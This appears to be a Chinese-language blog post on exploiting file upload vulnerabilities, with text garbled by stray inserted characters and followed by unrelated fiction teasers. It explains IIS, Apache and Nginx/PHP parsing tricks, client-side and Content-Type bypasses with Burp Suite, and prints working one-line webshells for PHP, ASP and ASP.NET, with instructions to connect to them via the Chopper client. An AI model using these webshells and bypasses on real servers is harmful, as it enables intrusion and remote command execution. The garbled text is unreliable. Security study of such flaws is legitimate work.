3.文件上傳漏洞

原因:
1.目錄過濾不嚴(yán),攻擊者可能建立畸形目錄
2.文件未重命名,攻擊者可能利用Web容器解析漏洞
3.客戶端過濾

利用:上傳漏洞可以直接得到webshell


解析漏洞

1. IIS解析漏洞

  • 當(dāng)建立.asa、.asp格式的文件夾時(shí),其目錄下的任意文件都被IIS當(dāng)作asp文件來解析。

  • 當(dāng)文件為*.asp;1.jpg時(shí)缺亮,IIS同樣會(huì)以ASP腳本來執(zhí)行。

    WebDav漏洞:是一種基于HTTP1.1協(xié)議的通信協(xié)議桥言,支持Put,Move,Copy等方法萌踱,可能有安全隱患,桂林老兵的IIS Write工具可以進(jìn)行掃描号阿。

2.Apache解析漏洞

解析原則: 遇到不認(rèn)識(shí)的擴(kuò)展名將從后向前解析虫蝶,如果都不認(rèn)識(shí),會(huì)暴露源代碼倦西。支持的擴(kuò)展名在(apache安裝目錄的/conf/mine.types/)

3.PHP的cgi解析漏洞

  • Nginx通常用來作為PHP的解析容器
  • 上傳圖片木馬在url后面加上“/.php”能真,圖片就會(huì)被當(dāng)作php腳本解析,php配置文件中cgi.fi:x_pathinfo*在有些版本中默認(rèn)開啟,php會(huì)向前遞歸解析粉铐。

客戶端驗(yàn)證繞過

  • 使用FireBug直接刪除客戶端JavaScript驗(yàn)證代碼
  • Burp Suite修改數(shù)據(jù)包

服務(wù)器端驗(yàn)證

  • 黑白名單
  • MIME驗(yàn)證
  • 目錄驗(yàn)證
  • 截?cái)嗌蟼鞴?/li>

1.擴(kuò)展名繞過

  • 如果.php不能上傳疼约,直接修改擴(kuò)展名(phP)再上傳
  • “菜刀”拿到webshell

2. JS繞過

  • 修改要上傳的木馬文件類型
  • 用burpsuite攔截上傳數(shù)據(jù)包,修改回原來的數(shù)據(jù)類型蝙泼,上傳成功
  • 用“中國菜刀” 連接木馬地址程剥,密碼為“123”

3.Content-Type(HTTP層)

Content-Type:內(nèi)容類型,一般是指網(wǎng)頁中存在的Content-Type汤踏,用于定義網(wǎng)絡(luò)文件的類型和網(wǎng)頁的編碼织鲸,決定文件接收方將以什么形式、什么編碼讀取這個(gè)文件溪胶,這就是經(jīng)陈Р粒看到一些Asp網(wǎng)頁點(diǎn)擊的結(jié)果卻是下載到的一個(gè)文件或一張圖片的原因。

  • 查看源碼發(fā)現(xiàn)沒有對上傳文件進(jìn)行限制哗脖,上傳失敗可能是后臺(tái)有判斷
  • 用burpsuite抓包修改Content-Type的值為“image/jpeg”瀑踢,圖片地址就是木馬文件地址
  • 用“中國菜刀”進(jìn)行其他入侵

一句話木馬:
PHP:
<?php @eval ($_POST[123]);?>
<?php echo shell_exec($_GET['cmd']);?>

ASP: <%eval request("chopper")%>

ASP.NET:
<%@ page Language="Jscript"%>
<%eval(Request.Item["chopper"],"unsafe');%>

圖片一句話木馬制作軟件:Edjpgcom

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市才避,隨后出現(xiàn)的幾起案子橱夭,更是在濱河造成了極大的恐慌,老刑警劉巖桑逝,帶你破解...
    沈念sama閱讀 216,544評論 6 501
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件棘劣,死亡現(xiàn)場離奇詭異,居然都是意外死亡楞遏,警方通過查閱死者的電腦和手機(jī)茬暇,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,430評論 3 392
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來橱健,“玉大人,你說我怎么就攤上這事沙廉【械矗” “怎么了?”我有些...
    開封第一講書人閱讀 162,764評論 0 353
  • 文/不壞的土叔 我叫張陵撬陵,是天一觀的道長珊皿。 經(jīng)常有香客問我,道長巨税,這世上最難降的妖魔是什么蟋定? 我笑而不...
    開封第一講書人閱讀 58,193評論 1 292
  • 正文 為了忘掉前任,我火速辦了婚禮草添,結(jié)果婚禮上驶兜,老公的妹妹穿的比我還像新娘。我一直安慰自己,他們只是感情好抄淑,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,216評論 6 388
  • 文/花漫 我一把揭開白布屠凶。 她就那樣靜靜地躺著,像睡著了一般肆资。 火紅的嫁衣襯著肌膚如雪矗愧。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,182評論 1 299
  • 那天郑原,我揣著相機(jī)與錄音唉韭,去河邊找鬼。 笑死犯犁,一個(gè)胖子當(dāng)著我的面吹牛属愤,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播栖秕,決...
    沈念sama閱讀 40,063評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼春塌,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了簇捍?” 一聲冷哼從身側(cè)響起只壳,我...
    開封第一講書人閱讀 38,917評論 0 274
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎暑塑,沒想到半個(gè)月后吼句,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,329評論 1 310
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡事格,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,543評論 2 332
  • 正文 我和宋清朗相戀三年惕艳,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片驹愚。...
    茶點(diǎn)故事閱讀 39,722評論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡远搪,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出逢捺,到底是詐尸還是另有隱情谁鳍,我是刑警寧澤,帶...
    沈念sama閱讀 35,425評論 5 343
  • 正文 年R本政府宣布劫瞳,位于F島的核電站倘潜,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏志于。R本人自食惡果不足惜涮因,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,019評論 3 326
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望伺绽。 院中可真熱鬧养泡,春花似錦嗜湃、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,671評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至输硝,卻和暖如春今瀑,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背点把。 一陣腳步聲響...
    開封第一講書人閱讀 32,825評論 1 269
  • 我被黑心中介騙來泰國打工橘荠, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人郎逃。 一個(gè)月前我還...
    沈念sama閱讀 47,729評論 2 368
  • 正文 我出身青樓哥童,卻偏偏與公主長得像,于是被迫代替她去往敵國和親褒翰。 傳聞我的和親對象是個(gè)殘疾皇子贮懈,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,614評論 2 353

推薦閱讀更多精彩內(nèi)容

  • 一、初步認(rèn)識(shí) 1.上傳功能:網(wǎng)站上各種可以上傳文件优训,圖片的地方可以被用作上傳點(diǎn)進(jìn)行非法上傳 2.上傳原理:在前端代...
    楠昭閱讀 1,628評論 1 11
  • 文件上傳漏洞是指用戶上傳了一個(gè)可執(zhí)行的腳本文件朵你,并通過此腳本文件獲得了執(zhí)行服務(wù)器端命令的能力。這種攻擊方式是最為直...
    付出從未后悔閱讀 1,140評論 0 4
  • 文件上傳漏洞: 1.本地驗(yàn)證 本地驗(yàn)證:客戶端本地通過前臺(tái)JS腳本進(jìn)行檢測揣非。 原理: 當(dāng)用戶在客戶端選擇文件點(diǎn)擊上...
    xaviershun閱讀 1,346評論 0 1
  • 解析導(dǎo)致的上傳漏洞 1.IIS6.0站上的目錄路徑檢測解析繞過上傳漏洞 默認(rèn) 遇到/就不解析后面的了IIS6.0目...
    xaviershun閱讀 405評論 0 1